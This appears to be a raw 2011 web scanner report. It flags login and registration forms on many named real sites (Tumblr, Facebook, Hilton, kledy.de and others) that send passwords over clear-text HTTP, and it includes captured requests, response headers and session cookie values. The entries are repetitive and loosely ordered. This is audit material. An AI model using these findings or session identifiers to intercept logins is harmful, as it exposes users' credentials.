GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:23 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:23 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:23 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:23 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy2.php
The form contains the following password field:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:23 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
GET /NA7/ats/careers/jobSearch.jsp?org=VIBRANT&cws=1 HTTP/1.1 Host: tbe.taleo.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:21 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: Wed, 31 Dec 1969 23:59:59 GMT Set-Cookie: JSESSIONID=C945AA07FE83ACD62665BD99018DE6A5.NA7_primary_jvm; Path=/NA7/ats P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 10486
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.bibsonomy.org/login_internal
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.bibsonomy.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:30 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Via: 1.1 www.bibsonomy.org, 1.1 www.bibsonomy.org X-Pingback: http://scraper.bibsonomy.org/xmlrpc Set-Cookie: JSESSIONID=69F28CAB61CBF1AC490EAB83BB7E82F5; Path=/ Connection: close Content-Length: 61584
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.coe.gatech.edu/home?destination=home
The form contains the following password field:
pass
Request
GET / HTTP/1.1 Host: www.coe.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.13 ETag: "cd5e8abd80fd03f2c8d32b33e06270c9" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Set-Cookie: SESSe21231bc09705de79a97f2d6b2e890fb=645k56n5kokbe2trg1b1r6h6e7; expires=Tue, 01-Mar-2011 01:27:06 GMT; path=/; domain=.coe.gatech.edu Last-Modified: Fri, 04 Feb 2011 19:45:42 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29065
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.facebook.com/
The form contains the following password field:
reg_passwd__
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=_8zhn; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:01:46 GMT Content-Length: 30973
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.jazdtech.com/techdirect/
The form contains the following password field:
password
Request
GET /techdirect/ HTTP/1.1 Host: www.jazdtech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:01:52 GMT Set-Cookie: JazdSession="a60b5303-7988-48d1-88b3-467a83635a2c:1297008112717"; Version=1; Max-Age=3600; Expires=Sun, 06-Feb-2011 17:01:52 GMT; Path=/ Set-Cookie: JazdTestCookie=1297008112717; Expires=Mon, 06-Feb-2012 16:01:52 GMT; Path=/ Set-Cookie: JSESSIONID=90039B3D2C4BBD4CB6E1E02847F77216; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Content-Length: 74356
GET /bookmarks.php/ HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:32:59 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94655
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... </h2> <form action="/login.php?return=/bookmarks.php/" id="thisform" method="post"> <p style="margin:0px;padding:0px"> ...[SNIP]... <br> <input type="password" name="password" class="login" tabindex="11"><br> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.kledy.de/login.php?return=/buttons.php
The form contains the following password field:
password
Request
GET /buttons.php HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:07:24 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55482
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... </h2> <form action="/login.php?return=/buttons.php" id="thisform" method="post"> <p style="margin:0px;padding:0px"> ...[SNIP]... <br> <input type="password" name="password" class="login" tabindex="11"><br> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.kledy.de/login.php?return=/groups.php
The form contains the following password field:
password
Request
GET /groups.php HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:07:26 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 38173
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... </h2> <form action="/login.php?return=/groups.php" id="thisform" method="post"> <p style="margin:0px;padding:0px"> ...[SNIP]... <br> <input type="password" name="password" class="login" tabindex="11"><br> ...[SNIP]...
GET /impressum.php HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:07:27 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 37681
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... </h2> <form action="/login.php?return=/impressum.php" id="thisform" method="post"> <p style="margin:0px;padding:0px"> ...[SNIP]... <br> <input type="password" name="password" class="login" tabindex="11"><br> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.kledy.de/login.php
The form contains the following password field:
password
Request
GET /login.php HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:33:13 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 31841
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... </h2> <form action="/login.php" id="thisform" method="post"> <p style="margin:0px;padding:0px"> ...[SNIP]... <br> <input type="password" name="password" class="login" tabindex="11"><br> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.kledy.de/login.php
The form contains the following password field:
password
Request
GET /login.php HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:33:13 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 31841
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... <div class="login-left"> <form action="/login.php" id="thisform" method="post"> <h2> ...[SNIP]... <br /> <input type="password" name="password" class="login" tabindex="11" /><br /> ...[SNIP]...
GET /topusers.php HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: referrer=1; PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:07:34 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 49739
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... </h2> <form action="/login.php?return=/topusers.php" id="thisform" method="post"> <p style="margin:0px;padding:0px"> ...[SNIP]... <br> <input type="password" name="password" class="login" tabindex="11"><br> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.linkagogo.com/go/Authenticate
The form contains the following password field:
code
Request
GET / HTTP/1.1 Host: www.linkagogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:32 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4 Last-Modified: Thu, 27 Jan 2011 16:40:09 GMT ETag: "7151cc-5bca-49ad69a490c40" Accept-Ranges: bytes Content-Length: 23498 Connection: close Content-Type: text/html
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.linkatopia.com/login
The form contains the following password field:
a2
Request
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:02 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=b0m32fe8ia2aj602f1o1q5f1r7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Connection: close Content-Type: text/html Content-Length: 15274
GET / HTTP/1.1 Host: www.migrationexpertzone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.myfitnesspal.com/account/login
The form contains the following password field:
password
Request
GET /nutrition-facts-calories/bjs HTTP/1.1 Host: www.myfitnesspal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.mylinkvault.com/users/register.php
The form contains the following password fields:
password
password_chk
Request
GET / HTTP/1.1 Host: www.mylinkvault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:48 GMT Server: Apache X-Powered-By: PHP/5.2.15 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Language: en Set-Cookie: PHPSESSID=os9t2670j382p7k3kipnt47et6; path=/; domain=.mylinkvault.com Vary: Accept-Encoding Content-Length: 12638 Connection: close Content-Type: text/html; charset=utf-8
GET / HTTP/1.1 Host: www.nmworkwear.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:09:18 GMT Server: Apache/2.2 X-Powered-By: PHP/5.2.17 Set-Cookie: XTCsid=ekde4uf6o3m1pae1sfc1dc4f16; path=/; domain=.nmworkwear.de Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 38134
GET /index.php HTTP/1.1 Host: www.nmworkwear.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:33:54 GMT Server: Apache/2.2 X-Powered-By: PHP/5.2.17 Set-Cookie: XTCsid=3ugqie5obq0npitc2bvsin2tr7; path=/; domain=.nmworkwear.de Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 38158
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://my.nowpublic.com/user/login
The form contains the following password field:
pass
Request
GET / HTTP/1.1 Host: www.nowpublic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:54 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n34), ht iad-agg-n34.panthercdn.com ETag: "ded758d99458fa48f10bde897667d88d" Cache-Control: max-age=360 Expires: Sat, 05 Feb 2011 23:07:58 GMT Age: 56 Content-Length: 86152 Content-Type: text/html; charset=utf-8 Last-Modified: Sat, 05 Feb 2011 22:50:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
GET / HTTP/1.1 Host: www.ortho.hyperguides.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:07:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: Developers B.S.A.T Etag: "" X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.10 Set-Cookie: af696fa0a123e22c58825b15193298d6=h3g6udk5uu72jmpmg705t2a1r2; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: ohg=1; expires=Sun, 06-Feb-2011 22:07:19 GMT Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 05 Feb 2011 22:07:19 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 43934
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.ota.org/members_only/login_menu.cfm
The form contains the following password field:
customer
Request
GET /members_only/login_menu.cfm HTTP/1.1 Host: www.ota.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><!-- InstanceBegin template="/Templates/index.dwt" codeOutsideHTMLIsLocke ...[SNIP]... <td>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.peppernews.eu/login.php?return=/
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.peppernews.eu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:10:56 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Set-Cookie: PHPSESSID=karceondeao8d2ilt1nprqs6k45brt7e; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 75079
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.spiele365.com/login.php?return=%2F
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.spiele365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:14:22 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Set-Cookie: PHPSESSID=1u37onl8uc70chts4qpd19rr0935a9tv; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 24726
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.stumbleupon.com/login.php
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://circle.stylemepretty.com/wp-login.php
The form contains the following password field:
pwd
Request
GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.stylemepretty.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding Set-Cookie: wpmp_switcher=desktop; expires=Mon, 06-Feb-2012 16:03:33 GMT; path=/ X-Pingback: http://www.stylemepretty.com/xmlrpc.php X-Mobilized-By: WordPress Mobile Pack 1.2.0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 06 Feb 2011 16:03:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 40429
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.technotizie.it/login-inside.php
The form contains the following password field:
pass2
Request
GET / HTTP/1.1 Host: www.technotizie.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.technotizie.it/register-rev1.php
The form contains the following password field:
user_pass
Request
GET / HTTP/1.1 Host: www.technotizie.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.tumblr.com/register
The form contains the following password field:
user[password]
Request
GET / HTTP/1.1 Host: www.tumblr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:16:04 GMT Server: Apache/2.2.3 (CentOS) P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL" Vary: Accept-Encoding X-Tumblr-Usec: D=38877 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.tumblr.com/login
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.tumblr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:16:04 GMT Server: Apache/2.2.3 (CentOS) P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL" Vary: Accept-Encoding X-Tumblr-Usec: D=38877 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--
GET /en_US/hi/customersupport/site-usage.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /en_US/hi/index.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www1.hilton.com/en_US/hi/index.do
The form contains the following password field:
password
Request
GET /en_US/hi/index.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
